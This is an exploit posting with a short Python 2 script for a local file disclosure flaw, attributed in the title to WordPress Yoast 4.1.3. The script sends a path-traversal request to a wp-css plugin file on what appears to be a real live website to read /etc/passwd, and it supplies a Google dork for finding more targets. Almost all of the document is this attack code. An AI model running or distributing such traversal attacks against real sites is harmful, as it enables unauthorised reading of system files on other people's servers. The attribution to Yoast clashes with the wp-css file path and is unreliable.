WordPress Yoast version 4.1.3 suffers from a file disclosure vulnerability.
907470ef4d35d3781b467b57b519bbb2b730a91a53cf08424ce0f5fd54577b97
#!/bin/python
print "###########################################################################"
print "# Exploit Title:WordPress Yoast v4.1.3 Local File Disclosure Vulnerability#"
print "# Author:Angel Injection #"
print "# Home Page: http://dev-point.com http://sec-krb.org #"
print "# Exploit find By H7acker110 #"
print "# python exploit find By Miroslav Stampar #"
print "# Note:Iam Angel Injection From the country of civilizations(iraq) #"
print "# Google Dork:inurl:wp-css-compress.php?f= #"
print "###########################################################################"
import urllib2
FILEPATH = "/etc/passwd"
req = urllib2.urlopen("http://profitseo.com/wp-content/plugins/wp-css/wp-css-compress.php?f=../../../../../../../../../../%s" % FILEPATH)
print "Filepath: '%s'" % FILEPATH
print "Content: %s" % repr(req.read())
#############################
print "Exploit Completed"
#############################
print "Inj3ct0r Team 4 ever"
#############################